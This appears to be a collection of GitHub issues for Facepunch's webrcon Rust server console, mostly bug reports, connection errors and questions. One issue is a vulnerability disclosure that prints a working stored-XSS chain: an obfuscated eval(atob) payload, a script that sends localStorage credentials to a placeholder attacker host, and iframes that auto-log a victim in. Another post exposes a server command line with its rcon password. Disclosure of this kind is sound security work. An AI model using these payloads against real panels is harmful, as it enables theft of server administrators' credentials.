I would like to address a security vulnerability in the current system.
At the moment you connect to the server by calling ws://<ip>:<port>/<plain-text-password>,
In this case, using a plain text password makes it very easy to gain access to the password through tracing someone's connection.
Therefore, I would like to suggest an alternative way to connect to the server.

As you already stated on the devblogs that webrcon is going to become the preferred rcon tool, this should be a secure solution.

The most effective way would be to use the wss:// protocol and to send the password in a message after establishing a connection. However. this would require every server to have a valid SSL certificate, which is really impractical.

Because of this, I'd suggest to connect to ws://<ip>:<port>/ and to use a handshake method. The server sends the client a salt in order for the client to be able to generate a hash of the password and to send it to the server.

Client        Server
connect message---->
<----------------salt
hashed password --->
<-------except/reject

please update for working https (SSL)

http://facepunch.github.io/webrcon/

👏🏼Github

Error:

TypeError: Cannot read property 'length' of null
at SVGGElement. (nv.d3.js:5654)
at d3.js:962
at d3_selection_each (d3.js:968)
at Array.d3_selectionPrototype.each (d3.js:961)
at SVGGElement. (nv.d3.js:5652)
at d3.js:962
at d3_selection_each (d3.js:968)
at Array.d3_selectionPrototype.each (d3.js:961)
at Array.chart (nv.d3.js:5498)
at Array.d3_selectionPrototype.call (d3.js:975)(anonymous function) @ angular.js:12520

Call stack:

tried access my server and friend server with both the official HTTP link and my own setup fails with connection error 1006

Trying to administrate a gmod server (not sure if this works for gmod as it doesn't say its wont)

Hello, I am trying to write a simple library for webRCON in C#. At the moment I am having a bit of trouble understanding the handshake method here. I'm pretty bad with java-script, so trying to deduce what is happening isn't proving very fruitful.

would it be possible for someone to write up some simple comments / docs explaining the connection process?

Thanks!

why is md and bootstrap mixed in the html templates?

The "Collections" number on my server keeps increasing till it starts lagging really hard.
What are this collections and how do I clear them?

Thanks

With the recent browser updates in Chrome, Edge, and Firefox, the webrcon stopped connecting. Doesn't provide an error, just does nothing when clicking the connect button.

If you click over a player's name in the chat, you will be redirected to player info section, but the Steam ID will be XXXXXXXXXXXXXXXXXX0 , that 0 at the end change the last real number of its Steam ID

When using HTTPS on facepunch.github.io/webrcon/ does not allow to connect to server.
The error message looks like this:
Error: The operation is insecure. RconService/Service.Connect@https://facepunch.github.io/webrcon/js/rconService.js:19:19 ConnectionController/$scope.Connect@https://facepunch.github.io/webrcon/js/connection.js:62:3 fn@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js line 213 > Function:4:209 e@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:254:74 $eval@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:133:309 $apply@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:134:12 compile/</<@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:254:124 dispatch@https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js:4:8497 add/r.handle@https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js:4:5235

When you run this behind a https nginx you cannot connect to because the ws:// is hardcoded

This is not working with passwords having multiple %% in it, I guess it is not properly using URLEncode.

Using +rcon.web 1 in the command line, we noticed that the server listens for the rcon port on all IPs (0.0.0.0:28016 fx).
Not using +rcon.web 1 in the command line makes it listen on the IP specified by rcon.ip. This is not the case for +rcon.web.

Command line:
./RustDedicated -batchmode +server.maxplayers 50 +server.ip 176.31.21.146 +server.port 28015 +rcon.web 1 +rcon.ip 176.31.21.146 +rcon.port 28017 +rcon.password "4o6itt" -logfile "log.txt"

Error on the log:

SocketException: Address already in use
at System.Net.Sockets.Socket.Bind (System.Net.EndPoint local_end) [0x00000] in :0
at System.Net.Sockets.TcpListener.Start (Int32 backlog) [0x00000] in :0
at System.Net.Sockets.TcpListener.Start () [0x00000] in :0
at WebSocketSharp.Server.WebSocketServer.startReceiving () [0x00000] in :0
at WebSocketSharp.Server.WebSocketServer.Start () [0x00000] in :0
at Facepunch.Rcon.Listener.Start () [0x00000] in :0
at Facepunch.RCon.Initialize () [0x00000] in :0
at Bootstrap+c__IteratorF.MoveNext () [0x00000] in :0
at UnityEngine.SetupCoroutine.InvokeMoveNext (IEnumerator enumerator, IntPtr returnValueAddress) [0x00000] in :0
UnityEngine.MonoBehaviour:StartCoroutine_Auto(IEnumerator)
UnityEngine.MonoBehaviour:StartCoroutine(IEnumerator)
c__IteratorE:MoveNext()
UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)

The ip address aren't used by anything else. nor is the port.

Do you always need password if you want to browse servers player count, map size, etc. ?

Summary

There is a cross-site scripting vulnerability when loading messages sent from the RCON panel. An attacker can deploy a Rust server, add the poisoned XSS message to the Rust chat, then trick a victim into automatically logging in and loading in the poisoned message which has the capability to retrieve the stored server credentials in the "localStorage" object.

Steps to Reproduce - alert prompt

1. Login to your own rust server
2. Browse to "http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"
3. Send the following message in chat from the RCON console...

<img/src='x'/onerror='alert(1)'/>

4. Observe the alert prompt. Additionally, refresh the page and observe the alert prompt

Steps to Reproduce - exfiltrating password

An attacker could host the following script on their HTTP server...

steal=btoa(JSON.stringify(localStorage))
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://YOUR_HOST/?x='+steal, true);
xhr.send();

Which would be stored on the service by sending the following message with the script source pointed towards the attacker controlled script...

<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vWU9VUkhPU1QiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Then, once the message has been sent to their own server, tricking a victim into loading the payload via the following attacker controlled page:

<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/info?password=password"></iframe>
<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"></iframe>

Which would exfiltrate the password by sending an HTTP request like this:

GET /?x=eyJwcmV2aW91c0Nvbm5lY3Rpb25zIjoiW3tcIkFkZHJlc3NcIjpcIllPVVJfU0VSVkVSXCIsXCJQYXNzd29yZFwiOlwiWU9VUl9QQVNTV09SRCFcIixcImRhdGVcIjpcIjIwMjEtMDItMjBUMDY6MjU6MDEuNDAxWlwifV0ifQ== HTTP/1.1

Impact

An attacker could use this to exfiltrate RCON passwords of anyone using the Facepunch RCON service.

Thank you for this reference implementation of a Rust RCON console.

Do you have any API documentation that describes the various commands that are available?

Also, is it possible to request some public information from a Rust server without the password (player count, and so on). Or how do services like battle metrics and rust monitor get all their info from servers they don't own?

Cheers and thank you

/CC @garrynewman

http://i.imgur.com/CzKxYZS.png

Hey there,
I recently was wondering if by any chance I could modify the packet so that when I execute it I can say something as someone else than the "SERVER". Problem probably is that I execute commands via the packet, regarding this I thought I'd ask if there is any known way of getting around it. I don't want to use any plugins just pure rcon

Hey so recently ive been looking for a web rcon so i tried this But when i try to connect it says

Connection was Closed - Error 1006

please Help since i really need this